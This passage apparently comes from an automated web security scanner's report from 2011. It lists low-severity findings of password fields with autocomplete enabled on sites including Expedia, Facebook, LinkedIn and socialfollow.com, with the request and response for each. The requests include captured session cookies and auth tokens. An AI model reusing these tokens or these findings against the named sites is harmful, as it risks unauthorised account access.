Content-Length: 72177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<div class="ExpressCheckoutContent">
                           <form method="post" action="#" id="NewBillingAddress" onsubmit="return ExpressCheckout.ChooseBillingAddress();">
   <div id="ChooseBillingAddress" style="display: none">
...[SNIP]...
<input type="hidden" class="FormFieldPrivateId" value="Password" />
   <input type="password" class="Textbox Field200 FormField" id="FormField_2" name="FormField[1][2]" value="" />
<div class="LittleNotePassword" style="display: none">
...[SNIP]...
<input type="hidden" class="FormFieldPrivateId" value="ConfirmPassword" />
   <input type="password" class="Textbox Field200 FormField" id="FormField_3" name="FormField[1][3]" value="" />
<div class="LittleNotePassword" style="display: none">
...[SNIP]...
19.16. http://www.eneighborhoods.com/login_form.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /login_form.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login_form.asp HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:39 GMT
Content-Length: 4661
Content-Type: text/html
Cache-control: private
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!--Login Start-->
<script
...[SNIP]...
<td>
                       <form method="post" name="formlogin" action="checklogin.asp?page=1" onSubmit="return verifylogin()" ID="Form1">
                           <table width="200" border="0" cellpadding="0" cellspacing="0" bgcolor="#d8e1eb">
...[SNIP]...
<div align="left">
                                           <input type="password" name="password" size="22" /></div>
...[SNIP]...
19.17. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /pub/agent.dll?qscr=logi&ussl=1&&zz=1304739356206 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=logi&ussl=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:13 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97787


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<table BORDER=0 CELLSPACING=0 CELLPADDING=0>
<FORM METHOD=POST NAME="MainForm" ACTION="/pub/agent.dll" onSubmit="return false;">

   
<script type="text/javascript">
...[SNIP]...
<td><INPUT TYPE=PASSWORD NAME="pas1" id="pas1" SIZE=25,1 MAXLENGTH=30 VALUE=""></TD>
...[SNIP]...
<TD><INPUT TYPE=PASSWORD NAME="pas2" id="pas2" SIZE=25,1 MAXLENGTH=30 VALUE=""></TD>
...[SNIP]...
19.18. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pub/agent.dll?qscr=logi&ussl=1&&zz=1304739356206 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=logi&ussl=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:13 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97787


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 width="100%" >
<FORM METHOD=POST NAME="SignIn1" ACTION="https://www.expedia.com/pub/agent.dll">
   <TR>
...[SNIP]...
<TD><INPUT TYPE=PASSWORD NAME=upwd id="upwd" MAXLENGTH=30 SIZE=30 onKeyPress="TEK('javascript:SubmitLogin()',event)"></TD>
...[SNIP]...
19.19. http://www.facebook.com/SocialFollow  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /SocialFollow

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /SocialFollow HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=dh9j6; reg_ext_ref=http%3A%2F%2Fwww.socialfollow.com%2F; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FSocialFollow; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Dpa.82321587255; wd=1066x968

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.49
X-Cnection: close
Date: Fri, 06 May 2011 17:41:49 GMT
Content-Length: 33424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...
19.20. http://www.gofileroom.com/lbmc/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lbmc/ HTTP/1.1
Host: www.gofileroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:13 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQQDACQB=MCGPLMNBAICKPDCMOMOHHOLJ; path=/
Date: Sat, 07 May 2011 01:44:13 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
<table cellpadding="0" cellspacing="5" border="0" width="274" height="158">
                                       <form id="frmlogin" action="default.asp" method="post">
                                       <input type="hidden" name="txtXML" value="">
...[SNIP]...
<td align="left" bordercolor="#000000">
                                        <input id="password" type="password" class="form" name="password" style="border:1px solid #005A3C; width: 170;height:20" size="20">
                                        </td>
...[SNIP]...
19.21. https://www.gofileroom.com/lbmc/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /lbmc/Default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lbmc/Default.asp HTTP/1.1
Host: www.gofileroom.com
Connection: keep-alive
Referer: http://www.gofileroom.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000; ASPSESSIONIDCQQDACQB=ICGPLMNBCLJHFOEMCEHHIHGA

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:17 GMT
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:17 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
<table cellpadding="0" cellspacing="5" border="0" width="274" height="158">
                                       <form id="frmlogin" action="default.asp" method="post">
                                       <input type="hidden" name="txtXML" value="">
...[SNIP]...
<td align="left" bordercolor="#000000">
                                        <input id="password" type="password" class="form" name="password" style="border:1px solid #005A3C; width: 170;height:20" size="20">
                                        </td>
...[SNIP]...
19.22. http://www.lbmc.com/user  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /user

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; has_js=1; __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.7.10.1304749048

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:36:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Last-Modified: Sat, 07 May 2011 01:16:10 GMT
ETag: "76f8bd4cc9a9795d232607337f136cda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="http://opengr
...[SNIP]...
</div><form action="http://www.lbmc.com/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...
19.23. http://www.linkedin.com/pub/social-follow/12/7a2/294  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /pub/social-follow/12/7a2/294

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pub/social-follow/12/7a2/294 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __utmz=23068709.1303163602.1.1.utmcsr=rockyou.com|utmccn=(referral)|utmcmd=referral|utmcct=/rymini/; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utma=23068709.2028061763.1303163602.1303561523.1304000549.4; __utmv=23068709.guest; JSESSIONID="ajax:1022634729605892638"; leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703510:a79f22fd5b55c77016e1e883ba6f2782d2bb74f6"; lang="v=2&lang=en"

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:9ALnYa_o7w0-_aDZAiRhif6cnHkmMFvo5bAux56op-0wmSGoVi5tpl:1304703833:12ab3b2206f30def848810f18bb65505a76b5904"; Version=1; Max-Age=1799; Expires=Fri, 06-May-2011 18:13:52 GMT; Path=/
Vary: Accept-Encoding
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Last-Modified: Thu, 09 Apr 2009 03:12:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 06 May 2011 17:43:53 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive
Content-Length: 26636

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...
<div class="content">


<form action="https://www.linkedin.com/profile/public-join-create" method="POST" name="coldRegistrationForm" >


<fieldset>
...[SNIP]...
</span>
<input type="password" name="password" value="" id="password-coldRegistrationForm" maxlength="250">
</div>
...[SNIP]...
19.24. http://www.resiteonline.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.resiteonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:52:13 GMT
Server:
Content-Length: 8284
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <m
...[SNIP]...
</h3>
       <form action="http://app.resiteit.com/control/" method="post" enctype="application/x-www-form-urlencoded">
       <div id="loginbox">
...[SNIP]...
<label>Password    <input type="password" name="Password" id="Password" /></label>
...[SNIP]...
19.25. http://www.socialfollow.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=a66e1734b752a527fe65db3fafc4b523; expires=Fri, 06 May 2011 19:37:36 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
19.26. http://www.socialfollow.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=a66e1734b752a527fe65db3fafc4b523; expires=Fri, 06 May 2011 19:37:36 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h1>
       <form method="post" name="fRegister" action="/register.php">
       <table>
...[SNIP]...
<td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td>
...[SNIP]...
<td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td>
...[SNIP]...
19.27. http://www.socialfollow.com/blog/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /blog/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
19.28. http://www.socialfollow.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
   <form method="post" name="fLogin" action="">
   <table>
...[SNIP]...
<td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td>
...[SNIP]...
19.29. http://www.socialfollow.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
